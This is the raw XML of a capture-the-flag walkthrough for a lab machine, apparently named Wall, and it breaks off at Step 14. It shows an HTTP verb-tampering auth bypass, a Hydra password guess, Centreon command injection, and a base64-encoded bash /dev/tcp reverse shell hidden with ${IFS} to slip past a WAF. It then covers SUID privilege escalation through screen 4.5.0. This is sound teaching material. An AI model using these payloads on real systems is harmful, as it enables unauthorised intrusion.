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185" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7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WALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 1: Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan on server 10.10.10.157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –A 10.10.10.157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="009F4BE3" w:rsidP="00E13EE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5pt;height:274.35pt">
            <v:imagedata r:id="rId6" o:title="nmap-(1)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: On accessing port 80, we get apache2 default page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:451.1pt;height:363.25pt">
            <v:imagedata r:id="rId7" o:title="port 80-(2)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E13EE7" w:rsidRDefault="00E13EE7" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 3: Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, you’ll find </w:t>
      </w:r>
      <w:r w:rsidR="003B3E81">
        <w:t xml:space="preserve">pages like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B3E81">
        <w:t>aa.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B3E81">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B3E81">
        <w:t>panel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B3E81">
        <w:t xml:space="preserve"> &amp; a directory called /monitoring with status code 401.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3E81" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:451.1pt;height:274.35pt">
            <v:imagedata r:id="rId8" o:title="monitoring 1-(4)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3E81" w:rsidRDefault="003B3E81" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Step 4: On accessing the /monitoring directory, we see it has basic au</w:t>
      </w:r>
      <w:r w:rsidR="003F1E11">
        <w:t>thentication implemented on it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F1E11" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:451.1pt;height:274.35pt">
            <v:imagedata r:id="rId8" o:title="monitoring 1-(4)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F1E11" w:rsidRDefault="003F1E11" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Step 5: To bypass this, a technique called verb tampering is used. Basically we change the request method to check the response. Find the link below for better understanding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F1E11" w:rsidRDefault="009F4BE3" w:rsidP="00E13EE7">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="003F1E11" w:rsidRPr="009E68C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=bZlkuiUkQzE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002E51D7" w:rsidRDefault="002E51D7" w:rsidP="00E13EE7"/>
    <w:p w:rsidR="003F1E11" w:rsidRDefault="003F1E11" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Here, </w:t>
      </w:r>
      <w:r w:rsidR="002E51D7">
        <w:t xml:space="preserve">we’ll see what happens. First, we send a GET </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002E51D7">
        <w:t>request,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002E51D7">
        <w:t xml:space="preserve"> in response we get a 401 status code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E51D7" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:451.1pt;height:4in">
            <v:imagedata r:id="rId10" o:title="curl GET-(5)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E51D7" w:rsidRDefault="002E51D7" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">But, when we send a POST request, we get 200 OK &amp; a directory which we didn’t see in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E51D7" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:450.55pt;height:234pt">
            <v:imagedata r:id="rId11" o:title="curl POST- (5)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00147FDC" w:rsidRDefault="00147FDC" w:rsidP="00E13EE7"/>
    <w:p w:rsidR="00147FDC" w:rsidRDefault="00147FDC" w:rsidP="00E13EE7"/>
    <w:p w:rsidR="00147FDC" w:rsidRDefault="00147FDC" w:rsidP="00E13EE7"/>
    <w:p w:rsidR="000A2803" w:rsidRDefault="00147FDC" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6: On accessing the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>centr</w:t>
      </w:r>
      <w:r w:rsidR="001076FE">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory, we get a login page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00147FDC" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:451.1pt;height:332.75pt">
            <v:imagedata r:id="rId12" o:title="centreon -(6)"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C1159C" w:rsidRDefault="00C1159C" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Step 7: For credentials, use Hydra with username “admin”, we get password as “password1”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC737C" w:rsidRDefault="001076FE" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 8: The part after logging in was the most crucial as we needed to understand the workflow of the application. </w:t>
      </w:r>
      <w:r w:rsidR="002D68E1">
        <w:t xml:space="preserve">Upon looking for the information of this application, we found it is vulnerable to remote code execution &amp; has an exploit. After reading the exploit, we see that a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D68E1">
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D68E1">
        <w:t xml:space="preserve"> is created using it, so we try. For some unknown reasons, the exploit didn’t work (for me, don’t know about others).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076FE" w:rsidRDefault="00AC737C" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 9: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the application manually. Looking </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the exploit, we know that the payload can be injected in </w:t>
      </w:r>
      <w:r w:rsidR="002B2D37">
        <w:t xml:space="preserve">“Monitoring engine binary” field. So we try to establish </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B2D37">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B2D37">
        <w:t xml:space="preserve"> connection, but noticed that a blank space is not allowed. This meaning a WAF might be working.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2D37" w:rsidRDefault="00BD085F" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">To bypass this, I learnt about something called </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Internal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> field separator </w:t>
      </w:r>
      <w:r>
        <w:t>(IFS). This is used to replace a</w:t>
      </w:r>
      <w:r w:rsidR="001B422C">
        <w:t xml:space="preserve"> blank, a </w:t>
      </w:r>
      <w:r>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidR="001B422C">
        <w:t xml:space="preserve"> or a new line etc. &amp; is written as ${IFS}. Long story short, I replaced a space with “${IFS}” &amp; enumerated…</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001B422C">
        <w:t>.&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001B422C">
        <w:t xml:space="preserve"> found user.txt….BUT was unable to read as it belonged to another user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B422C" w:rsidRDefault="001B422C" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Refer this for IFS: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00711D01">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.livefirelabs.com/unix_tip_trick_shell_script/oct_2003/10132003.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001B422C" w:rsidRDefault="001B422C" w:rsidP="00E13EE7">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00711D01">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/magnetikonline/5172b4dafcdc079f28e60f512528c8a6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001B422C" w:rsidRDefault="001B422C" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 10: To run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00105248">
        <w:t xml:space="preserve">, we need to export the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00105248">
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00105248">
        <w:t xml:space="preserve"> configuration. For that, click on “Export configuration” &gt; select our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00105248">
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00105248">
        <w:t xml:space="preserve"> &gt; select “Restart monitoring engine” &gt; select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00105248">
        <w:t>method :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00105248">
        <w:t xml:space="preserve"> Restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A272A" w:rsidRDefault="008A272A" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5735782" cy="25630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er expo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248" w:rsidRDefault="00105248" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">While enumerating, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>everytime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I followed the same process to make command injection work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105248" w:rsidRDefault="00105248" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">For shell, I had to try something different. Instead of executing the bash </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell command in plaintext, I encoded the entire command in base64 &amp; also added the “base64 –d” line at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342EF3" w:rsidRDefault="00342EF3" w:rsidP="00E13EE7">
      <w:r>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342EF3" w:rsidRDefault="00342EF3" w:rsidP="00E13EE7">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t xml:space="preserve"> -i &gt;&amp; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342EF3">
        <w:t>/10.10.16.23/8888 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> translates to</w:t>
      </w:r>
      <w:r w:rsidRPr="00342EF3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yMy84ODg4IDA+JjE=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342EF3" w:rsidRDefault="00342EF3" w:rsidP="00E13EE7">
      <w:r>
        <w:t>So my payload looked like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342EF3" w:rsidRPr="008A272A" w:rsidRDefault="00342EF3" w:rsidP="00E13EE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A272A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A272A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yMy84ODg4IDA+JjE=|base64${IFS}-d|bash;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105248" w:rsidRDefault="00342EF3" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidR="00105248">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A272A" w:rsidRDefault="008A272A" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">So now we inject this payload in the vulnerable input field &amp; start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener at the port mentioned in payload. After exporting this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, we get shell as www-data user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A272A" w:rsidRDefault="008A272A" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="49879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ll - (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36A" w:rsidRDefault="000D136A" w:rsidP="00E13EE7">
      <w:r>
        <w:t>When tried to read the user.txt, we get this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D136A" w:rsidRDefault="00A60547" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3162574" cy="20042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ll user permdeny-(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2A" w:rsidRDefault="008A272A" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 12: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D136A" w:rsidRDefault="000D136A" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">As we don’t have credentials for Shelby user, we look for privilege escalation. There are several techniques to look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, but the one which</w:t>
      </w:r>
      <w:r w:rsidR="00A60547">
        <w:t xml:space="preserve"> worked here was SUID exploiting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A60547" w:rsidRDefault="00A60547" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">To look for files having </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bit set, use this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E038F2" w:rsidRDefault="00E038F2" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Find / -perm –u=s –type f 2&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E038F2" w:rsidRDefault="00E038F2" w:rsidP="00E13EE7">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Which means:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E038F2" w:rsidRDefault="00E038F2" w:rsidP="00E038F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-perm –u=s : permissions with ‘s’ (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>suid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E038F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-type f : type of file as “file”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E038F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/null: Output to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A60547" w:rsidRDefault="00E038F2" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2616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id -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F2" w:rsidRDefault="00DB32A5" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Here, we see something different. Something called screen-4.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Step 13:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E13EE7">
      <w:r>
        <w:t>On looking for something on that, I found that the version is vulnerable &amp; has a well-written exploit for it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">You can find the exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>here :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00711D01">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/41154</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DB32A5" w:rsidRDefault="00DB32A5" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">To make it work, I searched &amp; found that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine has the same method for root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006A5BB8">
        <w:t xml:space="preserve"> So I ran the exploit as per the process described in the video at the link below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5BB8" w:rsidRDefault="00D222B3" w:rsidP="00E13EE7">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00711D01">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=99efqO48kK4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D222B3" w:rsidRDefault="00D222B3" w:rsidP="00E13EE7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starts at timestamp 19:17.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044477E" w:rsidRDefault="0044477E" w:rsidP="00E13EE7">
      <w:r>
        <w:t>I’m attaching the screenshots of the process I followed step-by-step below</w:t>
      </w:r>
      <w:r w:rsidR="00073F03">
        <w:t xml:space="preserve">. The files </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00073F03">
        <w:t>libhax.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00073F03">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00073F03">
        <w:t>rootshell.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00073F03">
        <w:t xml:space="preserve"> are created by me </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00073F03">
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00073F03">
        <w:t xml:space="preserve"> were present in the written exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D222B3" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2758679" cy="150127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bhaxc-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8B" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2430991" cy="131837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tshellc-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8B" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C6F8B" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2496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exploit-1-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8B" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="25203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exploit-1-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8B" w:rsidRDefault="007C6F8B" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="14852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exploit-1-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8B" w:rsidRDefault="00D17544" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="35566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exploit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A8" w:rsidRDefault="00DA1124" w:rsidP="00E13EE7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00B12BA8">
        <w:t xml:space="preserve">14: To make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B12BA8">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B12BA8">
